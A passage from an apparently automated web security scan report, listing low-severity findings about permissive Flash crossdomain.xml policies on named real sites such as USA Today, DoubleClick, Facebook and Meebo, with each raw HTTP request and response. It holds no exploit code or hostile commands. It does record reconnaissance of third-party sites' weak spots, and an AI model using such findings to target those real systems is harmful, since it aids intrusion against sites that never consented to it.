Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:35 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.65. http://data.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.66. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 01:55:59 GMT
Expires: Tue, 10 May 2011 01:55:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49166
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.67. http://i.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:58 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Tue, 12 Apr 2011 23:18:01 GMT
Accept-Ranges: bytes
Content-Length: 223
_eep-Alive: timeout=5, max=5
_onnection: Keep-Alive
Content-Type: application/xml
Via: CN-5000
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.69. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 05:11:30 GMT
Expires: Tue, 10 May 2011 05:11:30 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 37413
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.70. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 04:11:58 GMT
Expires: Tue, 10 May 2011 04:11:58 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 40983
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.71. http://rd.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:01 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

3.72. http://share.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://share.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: share.meebo.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 05 May 2010 22:56:50 GMT
ETag: "2211755815"
Content-Type: text/xml
Server: lighttpd/1.4.19
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:31 GMT
Date: Mon, 09 May 2011 15:35:31 GMT
Content-Length: 155
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.meebo.com"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
</cross-domain-policy>

3.73. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.74. http://syndication.mmismm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:02 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 21:27:32 GMT
ETag: "10e-4a188868f3900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.75. http://videos.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videos.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videos.usatoday.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "f3c5e455d9c4b849b778a0a303fe299c:1267469702"
Last-Modified: Mon, 01 Mar 2010 18:55:02 GMT
Accept-Ranges: bytes
Content-Length: 465
Content-Type: application/xml
Date: Mon, 09 May 2011 15:38:54 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.tv" secure="false" />
...[SNIP]...

3.76. http://www.collegesurfing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegesurfing.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Aug 2007 11:26:03 GMT
ETag: "219006d-c7-438d4dadd48c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.virtualcollegeadvisor.com" />
<allow-access-from domain="*.virtualcollegeadvisor.net" />
</cross-domain-policy>

3.77. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.111.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.78. http://www.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:02 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

3.79. http://www.npr.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
